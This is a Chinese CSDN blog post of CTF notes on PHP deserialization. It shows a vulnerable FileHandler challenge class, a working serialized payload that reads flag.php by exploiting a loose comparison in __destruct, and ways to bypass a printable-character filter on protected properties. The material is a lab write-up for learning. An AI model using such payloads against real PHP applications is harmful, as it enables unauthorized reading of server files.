# php反序列化

最新推荐文章于 2023-08-23 10:18:13 发布

_Stary

最新推荐文章于 2023-08-23 10:18:13 发布

阅读量79

点赞数

分类专栏： CTF 笔记文章标签：字符串 php

本文链接：https://blog.csdn.net/yaoge1225/article/details/118862734

版权

笔记同时被 2 个专栏收录

18 篇文章 0 订阅

订阅专栏

CTF

15 篇文章 0 订阅

订阅专栏

php反序列化

PHP反序列化的漏洞，通过控制read()读取flag.php的内容。

<?php 
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
    protected $op;
    protected $filename;
    protected $content;
    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
    public function process() {
 
        if($this->op == "1") {
 
            $this->write();
 
        } else if($this->op == "2") {
 
            $res = $this->read();
 
            $this->output($res);
 
        } else {
 
            $this->output("Bad Hacker!");
        }
    } 
    private function write() { 
        if(isset($this->filename) && isset($this->content)) { 
            if(strlen((string)$this->content) > 100) { 
                $this->output("Too long!"); 
                die();
            } 
            $res = file_put_contents($this->filename, $this->content); 
            if($res) $this->output("Successful!"); 
            else $this->output("Failed!"); 
        } else { 
            $this->output("Failed!");
        }
    } 
    private function read() { 
        $res = ""; 
        if(isset($this->filename)) { 
            $res = file_get_contents($this->filename);
        }
        return $res;
    } 
    private function output($s) { 
        echo "[Result]:";
        echo $s;
    } 
    function __destruct() { 
        if($this->op === "2")
            $this->op = "1"; 
        $this->content = ""; 
        $this->process();
    }
}  
function is_valid($s) { 
    for($i = 0; $i < strlen($s); $i++) 
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}

payload:
?str=O:11:“FileHandler”:3:{s:2:“op”;i:2;s:8:“filename”;s:8:“flag.php”;s:7:“content”;s:4:“nmsl”;}
坑：
1、is_valid()函数规定字符的ASCII码必须是32-125，而protected属性在序列化后会出现不可见字符\00*\00，转化为ASCII码不符合要求。
绕过方法：
①PHP7.1以上版本对属性类型不敏感，public属性序列化不会出现不可见字符，可以用public属性来绕过
②private属性序列化的时候会引入两个\x00，注意这两个\x00就是ascii码为0的字符。这个字符显示和输出可能看不到，甚至导致截断，但是url编码后就可以看得很清楚了。同理，protected属性会引入\x00*\x00。此时，为了更加方便进行反序列化Payload的传输与显示，我们可以在序列化内容中用大写S表示字符串，此时这个字符串就支持将后面的字符串用16进制表示。

_Stary

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
# php反序列化

php反序列化PHP反序列化的漏洞，通过控制read()读取flag.php的内容。<?php include("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =
复制链接

扫一扫